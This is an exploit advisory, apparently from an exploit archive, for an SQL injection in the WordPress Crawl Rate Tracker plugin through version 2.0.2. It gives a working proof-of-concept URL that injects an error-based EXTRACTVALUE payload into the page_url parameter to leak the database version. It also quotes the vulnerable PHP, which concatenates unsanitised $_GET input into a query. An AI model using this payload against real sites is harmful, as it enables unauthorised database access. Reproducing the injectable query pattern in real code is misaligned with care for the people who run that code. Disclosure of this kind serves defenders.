29 lines
No EOL
1.1 KiB
Text
29 lines
No EOL
1.1 KiB
Text
# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability
|
|
# Date: 2011-08-30
|
|
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
|
|
# Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip
|
|
# Version: 2.0.2 (tested)
|
|
# Note: magic_quotes has to be turned off
|
|
|
|
---
|
|
PoC
|
|
---
|
|
http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20
|
|
|
|
---------------
|
|
Vulnerable code
|
|
---------------
|
|
class b3_chartData extends b3_sbTrackingConfig
|
|
{
|
|
public function tracking_bot_report_chart_data()
|
|
{
|
|
...
|
|
if($_GET['page_url'] != '')
|
|
{
|
|
$bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` <= '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`");
|
|
...
|
|
|
|
if ($_GET['chart_data']==1) {
|
|
...
|
|
$chartData = new b3_chartData();
|
|
echo $chartData->tracking_bot_report_chart_data(); |